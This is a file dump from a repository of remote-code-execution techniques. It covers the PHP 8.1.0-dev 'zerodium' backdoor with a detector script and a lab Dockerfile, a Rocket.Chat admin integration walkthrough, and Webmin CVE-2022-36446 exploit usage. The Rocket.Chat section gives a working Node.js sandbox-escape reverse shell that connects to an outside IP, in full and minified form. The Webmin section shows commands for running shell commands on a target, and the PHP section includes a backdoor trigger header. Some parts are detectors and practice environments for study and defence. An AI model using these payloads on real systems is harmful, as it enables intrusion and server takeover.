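    "Zend/zend_execute_API.c": "ZEND_API zend_result zend_eval_string(const char *str, zval *retval_ptr, const char *string_name);\n",
    "main/main.c": "int php_request_startup(void) { return SUCCESS; }\n",
}
SAMPLE_REQUESTS = [
    {"Host": "127.0.0.1", "User-Agent": "Mozilla/5.0", "Accept-Encoding": "deflate"},
    {"Host": "127.0.0.1", "User-Agentt": "zerodiumsystem('id');", "Accept-Encoding": "deflate"},
    {"Host": "127.0.0.1", "User-Agent": "zerodium"},  # right value, wrong header name: never reaches the backdoor
]

if __name__ == "__main__":
    print(scan_sources(SAMPLE_FILES))    # only ext/zlib/zlib.c is reported
    print(flag_requests(SAMPLE_REQUESTS))  # [1]
```

`scan_tree(Path("/build/php"))` run against the checkout the Dockerfile below builds would report `ext/zlib/zlib.c`, and the same call on a current php-src checkout returns an empty dict; the request check is the complement, for deployments where the source is not at hand but the headers are.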
--------------------------------------------------------------------------------
/Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:buster

RUN apt-get -y -q update \
    && apt-get -y -q install wget tar git pkg-config build-essential autoconf bison re2c libxml2-dev libsqlite3-dev libapr1-dev libaprutil1-dev libpcre3 libpcre3-dev zlib1g-dev libpng-dev

# Building and installing apache2
RUN mkdir -p /build/ \
    && cd /build/ \
    && wget https://dlcdn.apache.org/httpd/httpd-2.4.54.tar.gz -O httpd.tar.gz \
    && tar xvf httpd.tar.gz \
    && cd httpd-2.4.54/ \
    && ./configure --enable-so \
    && make \
    && make install

# Building and installing php-8.1.0-dev
RUN mkdir -p /build/ \
    && cd /build/ \
    && git clone https://github.com/php/php-src/ /build/php/ \
    && cd /build/php/ \
    && git checkout c730aa26bd52829a49f2ad284b181b7e82a68d7d \
    && ./buildconf \
    && ./configure --with-apxs2=/usr/local/apache2/bin/apxs --with-pdo-mysql \
    && make -j4 \
    && make install \
    && echo "LoadModule php_module /build/php/libs/libphp.so" >> /usr/local/apache2/conf/httpd.conf \
    && echo '<FilesMatch \.php$>' >> /usr/local/apache2/conf/httpd.conf \
    && echo '    SetHandler application/x-httpd-php' >> /usr/local/apache2/conf/httpd.conf \
    && echo '</FilesMatch>' >> /usr/local/apache2/conf/httpd.conf

# dummy.php: the string echoed by the original page is not preserved; "..." stands in for it
RUN mkdir -p /usr/local/apache2/htdocs \
    && rm /usr/local/apache2/htdocs/index.html \
    && echo 'Dummy in HTML' > /usr/local/apache2/htdocs/dummy.html \
    && echo 'Dummy in PHP <?php echo "..."; ?>' > /usr/local/apache2/htdocs/dummy.php \
    && echo '<?php phpinfo(); ?>' > /usr/local/apache2/htdocs/phpinfo.php \
    && chown www-data: -R /usr/local/apache2/htdocs/

RUN echo "#!/bin/bash" > /entrypoint.sh \
    && echo "echo '===[Checking if backdoor is here]========================================================================'" >> /entrypoint.sh \
    && echo "grep -rain zerodium -n5 /build/php/ext/zlib/zlib.c" >> /entrypoint.sh \
    && echo "echo '========================================================================================================='" >> /entrypoint.sh \
    && echo "/usr/local/apache2/bin/apachectl -D FOREGROUND" >> /entrypoint.sh \
    && chmod +x /entrypoint.sh

EXPOSE 80

CMD /bin/bash

--------------------------------------------------------------------------------
/Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_php_8_1_0_dev_backdoor
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p $(PORT):80 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Other/README.md:
--------------------------------------------------------------------------------
# Other

## Softwares

- [**GiTea**: (1 technique)](./GiTea/)
- [**Gitlab**: (1 technique)](./Gitlab/)
- [**Jenkins**: (1 technique)](./Jenkins/)
- [**LimeSurvey**: (1 technique)](./LimeSurvey/)
- [**PHP**: (1 technique)](./PHP/)
- [**Rocket.Chat**: (1 technique)](./Rocket.Chat/)
- [**Webmin**: (1 technique)](./Webmin/)

--------------------------------------------------------------------------------
/Other/Rocket.Chat/README.md:
--------------------------------------------------------------------------------
# Rocket.Chat

Rocket.Chat is an open-source, fully customizable communications platform developed in JavaScript for organizations with high standards of data protection.

- Official site: https://rocket.chat/
- Source code: https://github.com/RocketChat/Rocket.Chat

## Techniques to achieve RCE with Rocket.Chat

### With admin credentials

- [Add an integration script](techniques/Add-an-integration-script/README.md)

--------------------------------------------------------------------------------
/Other/Rocket.Chat/techniques/Add-an-integration-script/README.md:
--------------------------------------------------------------------------------
# Rocket.Chat - Add an integration script

## Requirements

- Username and password of an admin account

## Exploitation

Once you're connected, you have access to the main dashboard at http://TARGET/channel/general:

![](./imgs/dashboard.png)

### Accessing the admin dashboard

Then you should be able to access the admin dashboard at http://TARGET/admin/info:

![](./imgs/admin_page.png)

### Adding an integration script

Once on the admin dashboard, go to the "Integrations" page at http://TARGET/admin/integrations and create a new integration by clicking on the "+New" button, or go directly to http://TARGET/admin/integrations/new/incoming:

![](./imgs/add_integration.png)

On this new page to create a new integration, we need to fill the "Post as" field with our username, and the "Post to Channel" field with the name of a known channel or our username prefixed by `@`. Don't forget to enable the integration by clicking on the enable switch at the top of the page (if you forget to do this you'll get a "Service Unavailable" in response to your POST request):

![](./imgs/add_integration_page.png)

Once this is done, we need to scroll down the page to the "Script" section, and add a script creating a reverse shell.
You can use the following script:

```js
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { execSync } = require('child_process');
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4444, "192.168.1.27", function(){
      client.pipe(sh.stdin);
      sh.stdout.pipe(client);
      sh.stderr.pipe(client);
    });
    return {}
  }
}
```

Here is the same script but minified:

```js
class Script{process_incoming_request({request}){const require=console.log.constructor('return process.mainModule.require')();const {execSync}=require('child_process');var n = require("net"),c=require("child_process"),p = c.spawn("/bin/sh",[]);var s = new n.Socket();s.connect(4444,"192.168.1.27",function(){s.pipe(p.stdin);p.stdout.pipe(s);p.stderr.pipe(s);});return {}}}
```

Then enable it by clicking on the enable switch on top of the "Script" textarea and save the integration by clicking on "Save" at the bottom of the page.

![](./imgs/script_added.png)

### Triggering the integration

Now that the integration script is installed in Rocket.Chat, we need to trigger it with a POST request to a specific endpoint. To get this endpoint, or directly the cURL command to call it, go back to the integration you just created and scroll down to the bottom of the page.

![](./imgs/getting_webhook_url.png)

Then we start a listener with `nc -lvnp 4444` in a terminal, and we launch the cURL command in another:

```sh
curl -X POST -H 'Content-Type: application/json' --data '{"text":"Example message"}' http://localhost:13000/hooks/YhhM5pSETkxH5yChf/4PW68bZhXbojY5sreznALpWL8tnYe8g7NtJh4FXqMrYorBkG
```

And we get a reverse shell on the Rocket.Chat server:

![](./imgs/got_shell.png)

## References
- https://docs.rocket.chat/quick-start/deploying-rocket.chat/rapid-deployment-methods/docker-and-docker-compose/docker-containers/available-images
- https://hackerone.com/reports/1130721
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat/
--------------------------------------------------------------------------------
/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration.png
--------------------------------------------------------------------------------
/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration_page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration_page.png
--------------------------------------------------------------------------------
/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/admin_page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/admin_page.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/dashboard.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/getting_webhook_url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/getting_webhook_url.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/got_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/got_shell.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/integration_enabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/integration_enabled.png -------------------------------------------------------------------------------- 
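Integration scripts are the persistence point of the Rocket.Chat technique above: the script is stored with the integration record and runs whenever the webhook is called. The following Python is an added example, not Rocket.Chat's own code, that audits stored integration scripts for the sandbox-escape primitives the README's script relies on (`.constructor(`, `process.mainModule`, `require('child_process')`, `spawn(`, an outbound `connect(port, host)`). The integration records are constructed samples in the shape `{name, enabled, script}`; exporting them from a real deployment (admin UI or database) is left to the reader.

```python
"""Audit stored Rocket.Chat integration scripts for sandbox-escape primitives.

Added example, not Rocket.Chat's own code. Integration scripts run inside a
restricted JavaScript sandbox; the README above shows one breaking out of it
via console.log.constructor('return process.mainModule.require')() and then
spawning /bin/sh over a socket. The scanner keys on the primitives that escape
needs, so every stored integration can be reviewed, enabled or not.
"""
import re
from typing import Dict, List, Mapping, Sequence

# (pattern, why it matters in a script that is supposed to be sandboxed)
SUSPICIOUS = [
    (re.compile(r"\.constructor\s*\("), "calls a Function constructor (classic sandbox escape)"),
    (re.compile(r"process\.(mainModule|binding)"), "reaches the host process's module loader"),
    (re.compile(r"\brequire\s*\(\s*['\"](child_process|net|fs|dgram|tls)['\"]"), "loads a privileged Node core module"),
    (re.compile(r"\b(spawn|spawnSync|exec|execSync|execFile|fork)\s*\("), "starts a child process"),
    (re.compile(r"\.connect\s*\(\s*\d+\s*,"), "opens an outbound TCP connection to a numeric port"),
]


def audit_script(source: str) -> List[str]:
    """Reasons the script looks dangerous, in SUSPICIOUS order; [] means clean."""
    return [why for pattern, why in SUSPICIOUS if pattern.search(source)]


def audit_integrations(integrations: Sequence[Mapping[str, object]]) -> Dict[str, List[str]]:
    """name -> findings for every integration whose script is not clean.

    A disabled integration is still reported: the script stays with the record
    and only needs the enable switch flipped to run.
    """
    report: Dict[str, List[str]] = {}
    for rec in integrations:
        findings = audit_script(str(rec.get("script", "")))
        if findings:
            label = f"{rec['name']}" + ("" if rec.get("enabled") else " (disabled)")
            report[label] = findings
    return report


# Constructed sample: a benign notifier script.
BENIGN = """
class Script {
  process_incoming_request({ request }) {
    return { content: { text: "Build " + request.content.build + ": " + request.content.status } };
  }
}
"""

# Constructed sample using the same primitives as the README's script, reduced
# to the parts the scanner keys on (host from the documentation range).
ESCAPE = """
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4444, "192.0.2.10", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); });
    return {}
  }
}
"""

SAMPLE_INTEGRATIONS = [
    {"name": "ci-notifier", "enabled": True, "script": BENIGN},
    {"name": "Example message", "enabled": False, "script": ESCAPE},
]

if __name__ == "__main__":
    for name, findings in audit_integrations(SAMPLE_INTEGRATIONS).items():
        print(name)
        for why in findings:
            print("  -", why)
```

Pattern matching on source is a triage aid, not a proof of safety: a script can obfuscate these names, so treat a clean result as "nothing obvious" and still limit who holds the admin role that can create integrations at all.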
/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/script_added.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/script_added.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/service_unavaible.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/service_unavaible.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Rocket.Chat - Add an integration script", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://docs.rocket.chat/quick-start/deploying-rocket.chat/rapid-deployment-methods/docker-and-docker-compose/docker-containers/available-images", 6 | "https://hackerone.com/reports/1130721", 7 | "https://blog.sonarsource.com/nosql-injections-in-rocket-chat/" 8 | ] 9 | } -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM rocketchat/rocket.chat.preview:3.12.1 2 | 3 | # Here I use the "preview" image because it deploys a container with a database inside 4 | # it's useful for quickly trying or running tests, not requiring a dedicated database installation 5 | 6 | # Setup is at http://localhost:13000/setup-wizard/1 
-------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_rocketchat_add_integration 4 | 5 | all : build start 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: 11 | docker run --rm -it -p 13000:3000 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 13000:3000 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Other/Webmin/README.md: -------------------------------------------------------------------------------- 1 | # Webmin 2 | 3 | Webmin is a powerful and flexible web-based server management control panel for Unix-like systems. 
4 | 5 | - Official site: https://www.webmin.com/ 6 | - Source code: https://github.com/webmin/webmin/ 7 | 8 | ## Techniques to achieve RCE with Webmin 9 | 10 | ### Version specific 11 | 12 | - [CVE-2022-36446: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)](techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/README.md) 13 | 14 | 15 | -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/README.md: -------------------------------------------------------------------------------- 1 | # Webmin < 1.997 - CVE-2022-36446 Remote Code Execution (RCE) (Authenticated) 2 | 3 | ## Requirements 4 | 5 | - Username and password of an account with rights to access to "Software packages Updates" 6 | 7 | ## Checking requirements 8 | 9 | If we want to check the requirements for this exploit, we first need to login to Webmin using the username and password: 10 | 11 | ![](./imgs/login.png) 12 | 13 | Then we need to have access to the "Software Package Updates" page (at: https://TARGET/package-updates/index.cgi?mode=updates&xnavigation=1) 14 | 15 | ![](./imgs/software_package_updates.png) 16 | 17 | If both of these steps are completed successfully, we can now exploit this Webmin. 18 | 19 | ## Exploitation 20 | 21 | Given that we need to authenticate to the Webmin and send a post request with a few parameters, it's easier to use a script for this technique. 
In the following tutorial we will use @p0dalirius's script: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE

### Single command

We can run a single command on the remote machine with the option `--command` (replace `<COMMAND>` with the command to run):

```
./CVE-2022-36446.py -t https://localhost:10080/ -u root -p root -k --command "<COMMAND>"
```

![](./imgs/exploit_single_command_mode.png)

### Interactive mode

We can also start it in interactive mode with the option `--interactive` to get a pseudo-shell:

```
./CVE-2022-36446.py -t https://localhost:10080/ -u root -p root -k --interactive
```

![](./imgs/exploit_interactive_mode.png)

## Demonstration

https://user-images.githubusercontent.com/79218792/184222596-3878e169-92ec-4507-99b5-3fe2c1d39360.mp4

## References

- https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
- https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
- https://nvd.nist.gov/vuln/detail/CVE-2022-36446
- https://netix.dl.sourceforge.net/project/webadmin/webmin/1.996/webmin-1.996.tar.gz
- https://github.com/advisories/GHSA-3q8j-9w3h-v6p5
--------------------------------------------------------------------------------
/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_interactive_mode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_interactive_mode.png
--------------------------------------------------------------------------------
/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_single_command_mode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_single_command_mode.png
--------------------------------------------------------------------------------
/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/login.png
--------------------------------------------------------------------------------
/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/software_package_updates.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/software_package_updates.png
--------------------------------------------------------------------------------
/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Webmin < 1.997 - CVE-2022-36446 Remote Code Execution (RCE) (Authenticated)",
    "work_in_progress": false,
    "references": [
        "https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE",
        "https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165",
        "https://nvd.nist.gov/vuln/detail/CVE-2022-36446",
        "https://netix.dl.sourceforge.net/project/webadmin/webmin/1.996/webmin-1.996.tar.gz",
        "https://github.com/advisories/GHSA-3q8j-9w3h-v6p5"
    ]
}
--------------------------------------------------------------------------------
/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:buster

RUN apt-get -y -q update \
    && apt-get -y -q install wget tar git libnet-ssleay-perl libauthen-pam-perl libio-pty-perl unzip shared-mime-info

# Install the vulnerable Webmin 1.996 release from the official package.
RUN mkdir -p /webmin/ \
    && wget https://github.com/webmin/webmin/releases/download/1.996/webmin_1.996_all.deb -O /webmin/webmin.deb \
    && dpkg -i /webmin/webmin.deb

# Test credentials for the lab container only.
RUN useradd -s /bin/bash webmin \
    && echo "webmin:webmin" | chpasswd \
    && echo "root:root" | chpasswd

RUN echo "#!/bin/bash" > /entrypoint.sh \
    && echo "cd /usr/share/webmin" >> /entrypoint.sh \
    && echo "./webmin-init start" >> /entrypoint.sh \
    && echo "./webmin-init status" >> /entrypoint.sh \
    && echo "tail -f /var/webmin/miniserv.error" >> /entrypoint.sh \
    && chmod +x /entrypoint.sh

# Webmin's miniserv listens on 10000; the Makefile maps $(PORT) to this port.
EXPOSE 10000

CMD /entrypoint.sh
--------------------------------------------------------------------------------
/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: all build start background shell stop

IMGNAME := awesome_rce_webmin_1_996
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start: build
	docker run --rm -it -p $(PORT):10000 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):10000 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Awesome RCE techniques


Awesome list of techniques to achieve Remote Code Execution (RCE) on various apps!

## Goal of this project

The goal of this project is to provide an open-source knowledge base of all the techniques to achieve Remote Code Execution (RCE) on various applications. Each technique also comes with a test environment (usually a Docker image) so you can practise it.

## Techniques

- [Content-Management-Systems-(CMS)](./Content-Management-Systems-(CMS)/)
    + [**Drupal**: (3 techniques)](./Content-Management-Systems-(CMS)/Drupal/)
    + [**FuelCMS**: (1 technique)](./Content-Management-Systems-(CMS)/FuelCMS/)
    + [**Joomla**: (1 technique)](./Content-Management-Systems-(CMS)/Joomla/)
    + [**SweetRice**: (2 techniques)](./Content-Management-Systems-(CMS)/SweetRice/)
    + [**Typo3**: (1 technique)](./Content-Management-Systems-(CMS)/Typo3/)
    + [**Wordpress**: (3 techniques)](./Content-Management-Systems-(CMS)/Wordpress/)

- [Frameworks](./Frameworks/)
    + [**Apache-Tomcat**: (2 techniques)](./Frameworks/Apache-Tomcat/)
    + [**JBoss**: (1 technique)](./Frameworks/JBoss/)
    + [**JoGet**: (1 technique)](./Frameworks/JoGet/)
    + [**WildFly**: (1 technique)](./Frameworks/WildFly/)

- [Learning-Management-Systems-(LMS)](./Learning-Management-Systems-(LMS)/)
    + [**Moodle**: (1 technique)](./Learning-Management-Systems-(LMS)/Moodle/)

- [Other](./Other/)
    + [**GiTea**: (1 technique)](./Other/GiTea/)
    + [**Gitlab**: (1 technique)](./Other/Gitlab/)
    + [**Jenkins**: (1 technique)](./Other/Jenkins/)
    + [**LimeSurvey**: (1 technique)](./Other/LimeSurvey/)
    + [**PHP**: (1 technique)](./Other/PHP/)
    + [**Rocket.Chat**: (1 technique)](./Other/Rocket.Chat/)
    + [**Webmin**: (1 technique)](./Other/Webmin/)

## Work in progress

These techniques are a work in progress. You can help us finish them by opening a pull request!

## Troubleshooting

Report all issues at https://github.com/p0dalirius/Awesome-RCE-techniques/issues.

## Contributors

Pull requests are welcome. Feel free to open an issue if you want to add other Remote Code Execution (RCE) techniques.
--------------------------------------------------------------------------------